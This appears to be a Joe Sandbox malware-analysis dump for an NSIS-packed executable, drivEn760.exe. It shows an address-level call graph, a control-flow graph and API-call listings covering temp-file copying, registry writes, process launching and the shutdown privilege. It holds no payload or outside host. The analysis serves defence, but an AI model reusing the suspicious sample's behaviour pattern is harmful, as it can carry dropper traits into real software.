40462b 3793->3833 3797 4049aa 3794->3797 3798 404943 3794->3798 3795->3792 3795->3793 3799 4048f0 GetDlgItem SendMessageW 3795->3799 3797->3793 3804 4049bc 3797->3804 3798->3797 3803 404969 SendMessageW LoadCursorW SetCursor 3798->3803 3826 4045e6 KiUserCallbackDispatcher 3799->3826 3800 404802 3806 4045c4 18 API calls 3800->3806 3802 4049e4 3830 404a32 3803->3830 3808 4049d2 3804->3808 3809 4049c2 SendMessageW 3804->3809 3811 40480f CheckDlgButton 3806->3811 3808->3802 3813 4049d8 SendMessageW 3808->3813 3809->3808 3810 40491a 3827 404a0e 3810->3827 3824 4045e6 KiUserCallbackDispatcher 3811->3824 3813->3802 3816 40482d GetDlgItem 3825 4045f9 SendMessageW 3816->3825 3818 404843 SendMessageW 3819 404860 GetSysColor 3818->3819 3820 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3818->3820 3819->3820 3820->3802 3822 4066a5 17 API calls 3821->3822 3823 4045cf SetDlgItemTextW 3822->3823 3823->3800 3824->3816 3825->3818 3826->3810 3828 404a21 SendMessageW 3827->3828 3829 404a1c 3827->3829 3828->3792 3829->3828 3847 405c8e ShellExecuteExW 3830->3847 3832 404998 LoadCursorW SetCursor 3832->3797 3834 4046ee 3833->3834 3835 404643 GetWindowLongW 3833->3835 3834->3802 3835->3834 3836 404658 3835->3836 3836->3834 3837 404685 GetSysColor 3836->3837 3838 404688 3836->3838 3837->3838 3839 404698 SetBkMode 3838->3839 3840 40468e SetTextColor 3838->3840 3841 4046b0 GetSysColor 3839->3841 3842 4046b6 3839->3842 3840->3839 3841->3842 3843 4046c7 3842->3843 3844 4046bd SetBkColor 3842->3844 3843->3834 3845 4046e1 CreateBrushIndirect 3843->3845 3846 4046da DeleteObject 3843->3846 3844->3843 3845->3834 3846->3845 3847->3832 4526 401503 4527 40150b 4526->4527 4529 40151e 4526->4529 4528 402d84 17 API calls 4527->4528 4528->4529 4530 402383 4531 40238a 4530->4531 4533 40239d 4530->4533 4532 4066a5 17 API calls 4531->4532 4534 402397 4532->4534 4535 405cc8 MessageBoxIndirectW 4534->4535 4535->4533 3946 402c05 SendMessageW 3947 402c2a 3946->3947 3948 402c1f InvalidateRect 3946->3948 3948->3947 3962 405809 3963 4059b3 3962->3963 3964 40582a GetDlgItem GetDlgItem GetDlgItem 3962->3964 3966 4059e4 3963->3966 3967 4059bc GetDlgItem CreateThread CloseHandle 3963->3967 4007 4045f9 SendMessageW 3964->4007 3969 405a0f 3966->3969 3970 405a34 3966->3970 3971 4059fb ShowWindow ShowWindow 3966->3971 3967->3966 4010 40579d 5 API calls 3967->4010 3968 40589a 3973 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3968->3973 3972 405a6f 3969->3972 3975 405a23 3969->3975 3976 405a49 ShowWindow 3969->3976 3977 40462b 8 API calls 3970->3977 4009 4045f9 SendMessageW 3971->4009 3972->3970 3982 405a7d SendMessageW 3972->3982 3980 4058f3 SendMessageW SendMessageW 3973->3980 3981 40590f 3973->3981 3983 40459d SendMessageW 3975->3983 3978 405a69 3976->3978 3979 405a5b 3976->3979 3988 405a42 3977->3988 3985 40459d SendMessageW 3978->3985 3984 4056ca 24 API calls 3979->3984 3980->3981 3986 405922 3981->3986 3987 405914 SendMessageW 3981->3987 3982->3988 3989 405a96 CreatePopupMenu 3982->3989 3983->3970 3984->3978 3985->3972 3991 4045c4 18 API calls 3986->3991 3987->3986 3990 4066a5 17 API calls 3989->3990 3992 405aa6 AppendMenuW 3990->3992 3993 405932 3991->3993 3994 405ac3 GetWindowRect 3992->3994 3995 405ad6 TrackPopupMenu 3992->3995 3996 40593b ShowWindow 3993->3996 3997 40596f GetDlgItem SendMessageW 3993->3997 3994->3995 3995->3988 3999 405af1 3995->3999 4000 405951 ShowWindow 3996->4000 4001 40595e 3996->4001 3997->3988 3998 405996 SendMessageW SendMessageW 3997->3998 3998->3988 4002 405b0d SendMessageW 3999->4002 4000->4001 4008 4045f9 SendMessageW 4001->4008 4002->4002 4003 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4002->4003 4005 405b4f SendMessageW 4003->4005 4005->4005 4006 405b78 GlobalUnlock SetClipboardData CloseClipboard 4005->4006 4006->3988 4007->3968 4008->3997 4009->3969 4536 40248a 4537 402da6 17 API calls 4536->4537 4538 40249c 4537->4538 4539 402da6 17 API calls 4538->4539 4540 4024a6 4539->4540 4553 402e36 4540->4553 4543 40292e 4544 4024de 4546 4024ea 4544->4546 4548 402d84 17 API calls 4544->4548 4545 402da6 17 API calls 4547 4024d4 lstrlenW 4545->4547 4549 402509 RegSetValueExW 4546->4549 4550 403371 44 API calls 4546->4550 4547->4544 4548->4546 4551 40251f RegCloseKey 4549->4551 4550->4549 4551->4543 4554 402e51 4553->4554 4557 406503 4554->4557 4558 406512 4557->4558 4559 4024b6 4558->4559 4560 40651d RegCreateKeyExW 4558->4560 4559->4543 4559->4544 4559->4545 4560->4559 4561 404e0b 4562 404e37 4561->4562 4563 404e1b 4561->4563 4565 404e6a 4562->4565 4566 404e3d SHGetPathFromIDListW 4562->4566 4572 405cac GetDlgItemTextW 4563->4572 4567 404e54 SendMessageW 4566->4567 4568 404e4d 4566->4568 4567->4565 4570 40140b 2 API calls 4568->4570 4569 404e28 SendMessageW 4569->4562 4570->4567 4572->4569 4573 40290b 4574 402da6 17 API calls 4573->4574 4575 402912 FindFirstFileW 4574->4575 4576 40293a 4575->4576 4580 402925 4575->4580 4581 4065af wsprintfW 4576->4581 4578 402943 4582 406668 lstrcpynW 4578->4582 4581->4578 4582->4580 4583 40190c 4584 401943 4583->4584 4585 402da6 17 API calls 4584->4585 4586 401948 4585->4586 4587 405d74 67 API calls 4586->4587 4588 401951 4587->4588 4589 40190f 4590 402da6 17 API calls 4589->4590 4591 401916 4590->4591 4592 405cc8 MessageBoxIndirectW 4591->4592 4593 40191f 4592->4593 4594 401491 4595 4056ca 24 API calls 4594->4595 4596 401498 4595->4596 4597 402891 4598 402898 4597->4598 4604 402ba9 4597->4604 4599 402d84 17 API calls 4598->4599 4600 40289f 4599->4600 4601 4028ae SetFilePointer 4600->4601 4602 4028be 4601->4602 4601->4604 4605 4065af wsprintfW 4602->4605 4605->4604 4606 401f12 4607 402da6 17 API calls 4606->4607 4608 401f18 4607->4608 4609 402da6 17 API calls 4608->4609 4610 401f21 4609->4610 4611 402da6 17 API calls 4610->4611 4612 401f2a 4611->4612 4613 402da6 17 API calls 4612->4613 4614 401f33 4613->4614 4615 401423 24 API calls 4614->4615 4616 401f3a 4615->4616 4623 405c8e ShellExecuteExW 4616->4623 4618 401f82 4619 406ae0 5 API calls 4618->4619 4621 40292e 4618->4621 4620 401f9f CloseHandle 4619->4620 4620->4621 4623->4618 4624 402f93 4625 402fa5 SetTimer 4624->4625 4626 402fbe 4624->4626 4625->4626 4627 40300c 4626->4627 4628 403012 MulDiv 4626->4628 4629 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4628->4629 4629->4627 4645 401d17 4646 402d84 17 API calls 4645->4646 4647 401d1d IsWindow 4646->4647 4648 401a20 4647->4648 4225 401b9b 4226 401bec 4225->4226 4229 401ba8 4225->4229 4227 401bf1 4226->4227 4228 401c16 GlobalAlloc 4226->4228 4238 40239d 4227->4238 4246 406668 lstrcpynW 4227->4246 4231 4066a5 17 API calls 4228->4231 4230 401c31 4229->4230 4235 401bbf 4229->4235 4232 4066a5 17 API calls 4230->4232 4230->4238 4231->4230 4234 402397 4232->4234 4239 405cc8 MessageBoxIndirectW 4234->4239 4244 406668 lstrcpynW 4235->4244 4236 401c03 GlobalFree 4236->4238 4239->4238 4240 401bce 4245 406668 lstrcpynW 4240->4245 4242 401bdd 4247 406668 lstrcpynW 4242->4247 4244->4240 4245->4242 4246->4236 4247->4238 4649 40261c 4650 402da6 17 API calls 4649->4650 4651 402623 4650->4651 4654 406158 GetFileAttributesW CreateFileW 4651->4654 4653 40262f 4654->4653 4662 40149e 4663 4014ac PostQuitMessage 4662->4663 4664 40239d 4662->4664 4663->4664 4665 40259e 4666 402de6 17 API calls 4665->4666 4667 4025a8 4666->4667 4668 402d84 17 API calls 4667->4668 4669 4025b1 4668->4669 4670 4025d9 RegEnumValueW 4669->4670 4671 4025cd RegEnumKeyW 4669->4671 4672 40292e 4669->4672 4673 4025ee RegCloseKey 4670->4673 4671->4673 4673->4672 4675 4015a3 4676 402da6 17 API calls 4675->4676 4677 4015aa SetFileAttributesW 4676->4677 4678 4015bc 4677->4678 3848 401fa4 3849 402da6 17 API calls 3848->3849 3850 401faa 3849->3850 3851 4056ca 24 API calls 3850->3851 3852 401fb4 3851->3852 3853 405c4b 2 API calls 3852->3853 3854 401fba 3853->3854 3857 40292e 3854->3857 3862 401fdd CloseHandle 3854->3862 3863 406ae0 WaitForSingleObject 3854->3863 3858 401fcf 3859 401fd4 3858->3859 3860 401fdf 3858->3860 3868 4065af wsprintfW 3859->3868 3860->3862 3862->3857 3864 406afa 3863->3864 3865 406b0c GetExitCodeProcess 3864->3865 3866 406a71 2 API calls 3864->3866 3865->3858 3867 406b01 WaitForSingleObject 3866->3867 3867->3864 3868->3862 3949 403c25 3950 403c40 3949->3950 3951 403c36 CloseHandle 3949->3951 3952 403c54 3950->3952 3953 403c4a CloseHandle 3950->3953 3951->3950 3958 403c82 3952->3958 3953->3952 3956 405d74 67 API calls 3957 403c65 3956->3957 3959 403c90 3958->3959 3960 403c59 3959->3960 3961 403c95 FreeLibrary GlobalFree 3959->3961 3960->3956 3961->3960 3961->3961 4011 40252a 4022 402de6 4011->4022 4014 402da6 17 API calls 4015 40253d 4014->4015 4016 402548 RegQueryValueExW 4015->4016 4020 40292e 4015->4020 4017 40256e RegCloseKey 4016->4017 4018 402568 4016->4018 4017->4020 4018->4017 4027 4065af wsprintfW 4018->4027 4023 402da6 17 API calls 4022->4023 4024 402dfd 4023->4024 4025 4064d5 RegOpenKeyExW 4024->4025 4026 402534 4025->4026 4026->4014 4027->4017 4679 40202a 4680 402da6 17 API calls 4679->4680 4681 402031 4680->4681 4682 406a35 5 API calls 4681->4682 4683 402040 4682->4683 4684 4020cc 4683->4684 4685 40205c GlobalAlloc 4683->4685 4685->4684 4686 402070 4685->4686 4687 406a35 5 API calls 4686->4687 4688 402077 4687->4688 4689 406a35 5 API calls 4688->4689 4690 402081 4689->4690 4690->4684 4694 4065af wsprintfW 4690->4694 4692 4020ba 4695 4065af wsprintfW 4692->4695 4694->4692 4695->4684 4696 4021aa 4697 402da6 17 API calls 4696->4697 4698 4021b1 4697->4698 4699 402da6 17 API calls 4698->4699 4700 4021bb 4699->4700 4701 402da6 17 API calls 4700->4701 4702 4021c5 4701->4702 4703 402da6 17 API calls 4702->4703 4704 4021cf 4703->4704 4705 402da6 17 API calls 4704->4705 4706 4021d9 4705->4706 4707 402218 CoCreateInstance 4706->4707 4708 402da6 17 API calls 4706->4708 4711 402237 4707->4711 4708->4707 4709 401423 24 API calls 4710 4022f6 4709->4710 4711->4709 4711->4710 4719 401a30 4720 402da6 17 API calls 4719->4720 4721 401a39 ExpandEnvironmentStringsW 4720->4721 4722 401a60 4721->4722 4723 401a4d 4721->4723 4723->4722 4724 401a52 lstrcmpW 4723->4724 4724->4722 4725 405031 GetDlgItem GetDlgItem 4726 405083 7 API calls 4725->4726 4727 4052a8 4725->4727 4728 40512a DeleteObject 4726->4728 4729 40511d SendMessageW 4726->4729 4732 40538a 4727->4732 4759 405317 4727->4759 4779 404f7f SendMessageW 4727->4779 4730 405133 4728->4730 4729->4728 4731 40516a 4730->4731 4735 4066a5 17 API calls 4730->4735 4733 4045c4 18 API calls 4731->4733 4734 405436 4732->4734 4738 40529b 4732->4738 4744 4053e3 SendMessageW 4732->4744 4737 40517e 4733->4737 4739 405440 SendMessageW 4734->4739 4740 405448 4734->4740 4736 40514c SendMessageW SendMessageW 4735->4736 4736->4730 4743 4045c4 18 API calls 4737->4743 4741 40462b 8 API calls 4738->4741 4739->4740 4747 405461 4740->4747 4748 40545a ImageList_Destroy 4740->4748 4755 405471 4740->4755 4746 405637 4741->4746 4760 40518f 4743->4760 4744->4738 4750 4053f8 SendMessageW 4744->4750 4745 40537c SendMessageW 4745->4732 4751 40546a GlobalFree 4747->4751 4747->4755 4748->4747 4749 4055eb 4749->4738 4756 4055fd ShowWindow GetDlgItem ShowWindow 4749->4756 4753 40540b 4750->4753 4751->4755 4752 40526a GetWindowLongW SetWindowLongW 4754 405283 4752->4754 4764 40541c SendMessageW 4753->4764 4757 4052a0 4754->4757 4758 405288 ShowWindow 4754->4758 4755->4749 4772 4054ac 4755->4772 4784 404fff 4755->4784 4756->4738 4778 4045f9 SendMessageW 4757->4778 4777 4045f9 SendMessageW 4758->4777 4759->4732 4759->4745 4760->4752 4763 4051e2 SendMessageW 4760->4763 4765 405265 4760->4765 4766 405220 SendMessageW 4760->4766 4767 405234 SendMessageW 4760->4767 4763->4760 4764->4734 4765->4752 4765->4754 4766->4760 4767->4760 4769 4055b6 4770 4055c1 InvalidateRect 4769->4770 4773 4055cd 4769->4773 4770->4773 4771 4054da SendMessageW 4775 4054f0 4771->4775 4772->4771 4772->4775 4773->4749 4776 404f3a 20 API calls 4773->4776 4774 405564 SendMessageW SendMessageW 4774->4775 4775->4769 4775->4774 4776->4749 4777->4738 4778->4727 4780 404fa2 GetMessagePos ScreenToClient SendMessageW 4779->4780 4781 404fde SendMessageW 4779->4781 4782 404fd6 4780->4782 4783 404fdb 4780->4783 4781->4782 4782->4759 4783->4781 4793 406668 lstrcpynW 4784->4793 4786 405012 4794 4065af wsprintfW 4786->4794 4788 40501c 4789 40140b 2 API calls 4788->4789 4790 405025 4789->4790 4795 406668 lstrcpynW 4790->4795 4792 40502c 4792->4772 4793->4786 4794->4788 4795->4792 4099 4023b2 4100 4023c0 4099->4100 4101 4023ba 4099->4101 4102 4023ce 4100->4102 4104 402da6 17 API calls 4100->4104 4103 402da6 17 API calls 4101->4103 4105 402da6 17 API calls 4102->4105 4107 4023dc 4102->4107 4103->4100 4104->4102 4105->4107 4106 402da6 17 API calls 4108 4023e5 WritePrivateProfileStringW 4106->4108 4107->4106 4801 404734 lstrlenW 4802 404753 4801->4802 4803 404755 WideCharToMultiByte 4801->4803 4802->4803 4804 402434 4805 402467 4804->4805 4806 40243c 4804->4806 4808 402da6 17 API calls 4805->4808 4807 402de6 17 API calls 4806->4807 4809 402443 4807->4809 4810 40246e 4808->4810 4812 402da6 17 API calls 4809->4812 4814 40247b 4809->4814 4815 402e64 4810->4815 4813 402454 RegDeleteValueW RegCloseKey 4812->4813 4813->4814 4816 402e78 4815->4816 4818 402e71 4815->4818 4816->4818 4819 402ea9 4816->4819 4818->4814 4820 4064d5 RegOpenKeyExW 4819->4820 4821 402ed7 4820->4821 4822 402ee7 RegEnumValueW 4821->4822 4826 402f0a 4821->4826 4830 402f81 4821->4830 4823 402f71 RegCloseKey 4822->4823 4822->4826 4823->4830 4824 402f46 RegEnumKeyW 4825 402f4f RegCloseKey 4824->4825 4824->4826 4827 406a35 5 API calls 4825->4827 4826->4823 4826->4824 4826->4825 4828 402ea9 6 API calls 4826->4828 4829 402f5f 4827->4829 4828->4826 4829->4830 4831 402f63 RegDeleteKeyW 4829->4831 4830->4818 4831->4830 4116 404ab5 4117 404ae1 4116->4117 4118 404af2 4116->4118 4196 405cac GetDlgItemTextW 4117->4196 4119 404afe GetDlgItem 4118->4119 4126 404b6a 4118->4126 4122 404b12 4119->4122 4121 404aec 4124 4068ef 5 API calls 4121->4124 4125 404b26 SetWindowTextW 4122->4125 4129 405fe2 4 API calls 4122->4129 4123 404c41 4179 404df0 4123->4179 4183 405cac GetDlgItemTextW 4123->4183 4124->4118 4132 4045c4 18 API calls 4125->4132 4126->4123 4130 4066a5 17 API calls 4126->4130 4126->4179 4128 40462b 8 API calls 4133 404e04 4128->4133 4134 404b1c 4129->4134 4135 404bd1 SHBrowseForFolderW 4130->4135 4131 404c71 4136 40603f 18 API calls 4131->4136 4137 404b42 4132->4137 4134->4125 4141 405f37 3 API calls 4134->4141 4135->4123 4138 404be9 CoTaskMemFree 4135->4138 4139 404c77 4136->4139 4140 4045c4 18 API calls 4137->4140 4142 405f37 3 API calls 4138->4142 4184 406668 lstrcpynW 4139->4184 4143 404b50 4140->4143 4141->4125 4146 404bf6 4142->4146 4182 4045f9 SendMessageW 4143->4182 4147 404c2d SetDlgItemTextW 4146->4147 4152 4066a5 17 API calls 4146->4152 4147->4123 4148 404c8e 4150 406a35 5 API calls 4148->4150 4149 404b56 4151 406a35 5 API calls 4149->4151 4160 404c95 4150->4160 4153 404b5d 4151->4153 4154 404c15 lstrcmpiW 4152->4154 4156 404b65 SHAutoComplete 4153->4156 4153->4179 4154->4147 4157 404c26 lstrcatW 4154->4157 4155 404cd6 4197 406668 lstrcpynW 4155->4197 4156->4126 4157->4147 4158 404ca4 GetDiskFreeSpaceExW 4158->4160 4168 404d2e 4158->4168 4160->4155 4160->4158 4163 405f83 2 API calls 4160->4163 4161 404cdd 4162 405fe2 4 API calls 4161->4162 4164 404ce3 4162->4164 4163->4160 4165 404ce9 4164->4165 4166 404cec GetDiskFreeSpaceW 4164->4166 4165->4166 4167 404d07 MulDiv 4166->4167 4166->4168 4167->4168 4178 404d9f 4168->4178 4185 404f3a 4168->4185 4170 40140b 2 API calls 4171 404dc2 4170->4171 4198 4045e6 KiUserCallbackDispatcher 4171->4198 4173 404da1 SetDlgItemTextW 4173->4178 4174 404d91 4188 404e71 4174->4188 4177 404dde 4177->4179 4180 404deb 4177->4180 4178->4170 4178->4171 4179->4128 4181 404a0e SendMessageW 4180->4181 4181->4179 4182->4149 4183->4131 4184->4148 4186 404e71 20 API calls 4185->4186 4187 404d8c 4186->4187 4187->4173 4187->4174 4189 404e8a 4188->4189 4190 4066a5 17 API calls 4189->4190 4191 404eee 4190->4191 4192 4066a5 17 API calls 4191->4192 4193 404ef9 4192->4193 4194 4066a5 17 API calls 4193->4194 4195 404f0f lstrlenW wsprintfW SetDlgItemTextW 4194->4195 4195->4178 4196->4121 4197->4161 4198->4177 4832 401735 4833 402da6 17 API calls 4832->4833 4834 40173c SearchPathW 4833->4834 4835 401757 4834->4835 4836 401d38 4837 402d84 17 API calls 4836->4837 4838 401d3f 4837->4838 4839 402d84 17 API calls 4838->4839 4840 401d4b GetDlgItem 4839->4840 4841 402638 4840->4841 4842 4014b8 4843 4014be 4842->4843 4844 401389 2 API calls 4843->4844 4845 4014c6 4844->4845 4846 40563e 4847 405662 4846->4847 4848 40564e 4846->4848 4851 40566a IsWindowVisible 4847->4851 4857 405681 4847->4857 4849 405654 4848->4849 4850 4056ab 4848->4850 4853 404610 SendMessageW 4849->4853 4852 4056b0 CallWindowProcW 4850->4852 4851->4850 4854 405677 4851->4854 4855 40565e 4852->4855 4853->4855 4856 404f7f 5 API calls 4854->4856 4856->4857 4857->4852 4858 404fff 4 API calls 4857->4858 4858->4850 4859 40263e 4860 402652 4859->4860 4861 40266d 4859->4861 4862 402d84 17 API calls 4860->4862 4863 402672 4861->4863 4864 40269d 4861->4864 4873 402659 4862->4873 4866 402da6 17 API calls 4863->4866 4865 402da6 17 API calls 4864->4865 4868 4026a4 lstrlenW 4865->4868 4867 402679 4866->4867 4876 40668a WideCharToMultiByte 4867->4876 4868->4873 4870 40268d lstrlenA 4870->4873 4871 4026e7 4872 4026d1 4872->4871 4874 40620a WriteFile 4872->4874 4873->4871 4873->4872 4875 406239 5 API calls 4873->4875 4874->4871 4875->4872 4876->4870

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a ExitProcess CoUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 72 403b91-403b97 65->72 73 403b7c-403b8b call 405cc8 ExitProcess 65->73 66->53 67->53 67->66 88 403a0c-403a19 69->88 89 4039bc-4039f1 69->89 83 403a54-403a57 70->83 74 403b99-403bae GetCurrentProcess OpenProcessToken 72->74 75 403c0f-403c17 72->75 80 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 74->80 81 403bdf-403bed call 406a35 74->81 84 403c19 75->84 85 403c1c-403c1f ExitProcess 75->85 80->81 95 403bfb-403c06 ExitWindowsEx 81->95 96 403bef-403bf9 81->96 83->65 84->85 90 403a1b-403a29 call 40603f 88->90 91 403a5c-403a70 call 405c33 lstrcatW 88->91 93 4039f3-4039f7 89->93 90->65 104 403a2f-403a45 call 406668 * 2 90->104 107 403a72-403a78 lstrcatW 91->107 108 403a7d-403a97 lstrcatW lstrcmpiW 91->108 98 403a00-403a08 93->98 99 4039f9-4039fe 93->99 95->75 101 403c08-403c0a call 40140b 95->101 96->95 96->101 98->93 103 403a0a 98->103 99->98 99->103 101->75 103->88 104->70 107->108 109 403b6a 108->109 110 403a9d-403aa0 108->110 109->65 112 403aa2-403aa7 call 405b99 110->112 113 403aa9 call 405c16 110->113 119 403aae-403abe SetCurrentDirectoryW 112->119 113->119 121 403ac0-403ac6 call 406668 119->121 122 403acb-403af7 call 406668 119->122 121->122 126 403afc-403b17 call 4066a5 DeleteFileW 122->126 129 403b57-403b61 126->129 130 403b19-403b29 CopyFileW 126->130 129->126 132 403b63-403b65 call 406428 129->132 130->129 131 403b2b-403b4b call 406428 call 4066a5 call 405c4b 130->131 131->129 140 403b4d-403b54 CloseHandle 131->140 132->109 140->129
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                                                                                                            • GetVersionExW.KERNEL32(?), ref: 0040368C
                                                                                                            • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                                                                                                            • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                                                                                                            • OleInitialize.OLE32(00000000), ref: 0040377D
                                                                                                            • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                                                                                                            • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                                                                                                            • CharNextW.USER32(00000000,"C:\Users\user\AppData\Local\Temp\drivEn760.exe" ,00000020,"C:\Users\user\AppData\Local\Temp\drivEn760.exe" ,00000000), ref: 004037E9
                                                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                                                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                                                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                                                                                                            • DeleteFileW.KERNELBASE(1033), ref: 00403982
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Local\Temp\drivEn760.exe" ,00000000,?), ref: 00403A69
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Local\Temp\drivEn760.exe" ,00000000,?), ref: 00403A78
                                                                                                              • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Local\Temp\drivEn760.exe" ,00000000,?), ref: 00403A83
                                                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\AppData\Local\Temp\drivEn760.exe" ,00000000,?), ref: 00403A8F
                                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                                                                                                            • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                                                                                                            • CopyFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\drivEn760.exe,00420F08,00000001), ref: 00403B21
                                                                                                            • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                                                                                                            • ExitProcess.KERNEL32(?), ref: 00403B6C
                                                                                                            • CoUninitialize.COMBASE(?), ref: 00403B71
                                                                                                            • ExitProcess.KERNEL32 ref: 00403B8B
                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                                                                                                            • ExitProcess.KERNEL32 ref: 00403C1F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.2315048788.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.2314152649.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2315981766.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000042B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000043F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2316067501.000000000044A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.2318734216.000000000044D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_400000_drivEn760.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
